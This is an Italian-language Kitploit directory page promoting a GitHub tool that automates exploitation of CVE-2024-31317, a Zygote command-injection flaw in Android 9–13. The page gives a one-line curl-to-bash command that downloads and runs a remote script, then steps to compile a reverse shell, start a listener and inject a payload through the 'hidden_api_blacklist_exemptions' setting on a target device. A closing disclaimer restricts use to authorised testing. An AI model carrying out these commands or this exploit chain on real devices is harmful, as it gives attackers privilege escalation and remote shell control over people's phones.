Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Sicurezza AndroidEscalation di PrivilegiExploitShellcodePenetration TestingSicurezza MobileSviluppo PayloadBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Strumento di distribuzione automatizzata per il PoC di CVE-2024-31317 su Android 9-13, che consente l'escalation dei privilegi tramite iniezione Zygote ed esecuzione di reverse shell.

Vedi Repository
528671 anno faRevisionato da Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Uno strumento di distribuzione per il proof-of-concept di CVE-2024-31317, mirato ai dispositivi Android dalla versione 9 alla 13.

📝 Descrizione del progetto

CVE-2024-31317-PoC-Deployer è uno script di distribuzione automatizzato per generare e configurare rapidamente tutti i file necessari per lo sfruttamento della vulnerabilità CVE-2024-31317. Questa vulnerabilità interessa i dispositivi Android 9-13 e consente l'escalation dei privilegi e l'esecuzione di codice arbitrario tramite il processo Zygote.

🚨 Informazioni sulla vulnerabilità

  • CVE ID: CVE-2024-31317
  • Scopo: Da Android 9 a Android 13
  • Versione di correzione: Livello di patch di giugno 2024 e versioni successive di Android
  • Tipo di vulnerabilità: Iniezione di comandi nel processo Zygote
  • Permesso richiesto: WRITE_SECURE_SETTINGS

📦 File inclusi

  • reverse_shell.c - Programma reverse shell implementato in C
  • payload.txt - Payload di sfruttamento appositamente costruito
  • compile.sh - Script di compilazione automatica
  • README.txt - Istruzioni dettagliate per l'uso
  • CVE-2024-31317.txt - Documentazione tecnica della vulnerabilità

🛠️ Avvio rapido

  1. Esegui lo script di distribuzione remota:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Compila la reverse shell:

    root@kitploit:~
    sh compile.sh
    
  3. Avvia il listener della reverse shell:

    root@kitploit:~
    sh reverse_shell
    

💣 Passaggi per lo sfruttamento

  1. Carica payload.txt nella directory /data/local/tmp/ del dispositivo target
  2. Sostituisci xxx.xxx.xxx in payload.txt con l'IP del tuo server di ascolto
  3. Esegui la seguente sequenza di comandi sul dispositivo target:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza e scopi di ricerca legali. È necessario ottenere un'autorizzazione esplicita dal sistema target prima dell'uso. L'uso non autorizzato potrebbe violare la legge. Lo sviluppatore non si assume alcuna responsabilità per abusi.

📜 Licenza

Questo progetto è concesso in licenza con licenza MIT - consultare il file LICENSE per i dettagli.

📚 Riferimenti tecnici

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
Scarica lo strumento